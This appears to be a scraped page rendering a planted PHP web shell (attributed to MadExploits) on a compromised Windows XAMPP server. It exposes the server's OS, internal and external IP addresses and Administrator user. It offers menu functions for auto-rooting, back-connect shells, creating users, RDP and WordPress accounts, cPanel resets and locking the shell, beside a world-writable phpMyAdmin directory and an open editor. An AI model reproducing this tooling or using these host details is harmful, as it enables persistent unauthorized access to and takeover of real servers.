Windows NT IZOXMIX7871CBCZ 6.3 build 9600 (Windows Server 2012 R2 Datacenter Edition) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
: 172.23.17.241 | : 3.128.171.149
Cant Read [ /etc/named.conf ]
8.2.12
Administrator
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
[ C ]
C: /
xampp /
phpMyAdmin /
[ HOME SHELL ]
Name
Size
Permission
Action
doc
[ DIR ]
drwxrwxrwx
examples
[ DIR ]
drwxrwxrwx
js
[ DIR ]
drwxrwxrwx
libraries
[ DIR ]
drwxrwxrwx
locale
[ DIR ]
drwxrwxrwx
setup
[ DIR ]
drwxrwxrwx
sql
[ DIR ]
drwxrwxrwx
templates
[ DIR ]
drwxrwxrwx
themes
[ DIR ]
drwxrwxrwx
vendor
[ DIR ]
drwxrwxrwx
.rtlcssrc.json
20
B
-rw-rw-rw-
CONTRIBUTING.md
2.53
KB
-rw-rw-rw-
ChangeLog
69.34
KB
-rw-rw-rw-
LICENSE
17.67
KB
-rw-rw-rw-
README
1.48
KB
-rw-rw-rw-
RELEASE-DATE-5.2.1
29
B
-rw-rw-rw-
adminer.php
465.43
KB
-rw-rw-rw-
babel.config.json
69
B
-rw-rw-rw-
composer.json
5.2
KB
-rw-rw-rw-
composer.lock
298.68
KB
-rw-rw-rw-
config.inc.php
2
KB
-rw-rw-rw-
config.sample.inc.php
4.7
KB
-rw-rw-rw-
favicon.ico
21.96
KB
-rw-rw-rw-
index.php
1.05
KB
-rw-rw-rw-
package.json
2.72
KB
-rw-rw-rw-
robots.txt
26
B
-rw-rw-rw-
show_config_errors.php
1.13
KB
-rw-rw-rw-
url.php
965
B
-rw-rw-rw-
yarn.lock
247.17
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : show_config_errors.php
<?php /** * Simple wrapper just to enable error reporting and include config */ declare(strict_types=1); if (! defined('ROOT_PATH')) { // phpcs:disable PSR1.Files.SideEffects define('ROOT_PATH', __DIR__ . DIRECTORY_SEPARATOR); // phpcs:enable } // rfc2616 - Section 14.21 header('Expires: ' . gmdate(DATE_RFC1123)); // HTTP/1.1 header('Cache-Control: no-store, no-cache, must-revalidate, pre-check=0, post-check=0, max-age=0'); header('Pragma: no-cache'); // HTTP/1.0 // test case: exporting a database into a .gz file with Safari // would produce files not having the current time // (added this header for Safari but should not harm other browsers) header('Last-Modified: ' . gmdate(DATE_RFC1123)); header('Content-Type: text/html; charset=utf-8'); // phpcs:disable PSR1.Files.SideEffects define('PHPMYADMIN', true); // phpcs:enable require ROOT_PATH . 'libraries/constants.php'; // issue #16256 - This only works with php 8.0+ if (function_exists('error_reporting')) { error_reporting(E_ALL); } /** * Read config file. */ if (is_readable(CONFIG_FILE)) { /** @psalm-suppress MissingFile */ include CONFIG_FILE; }
Close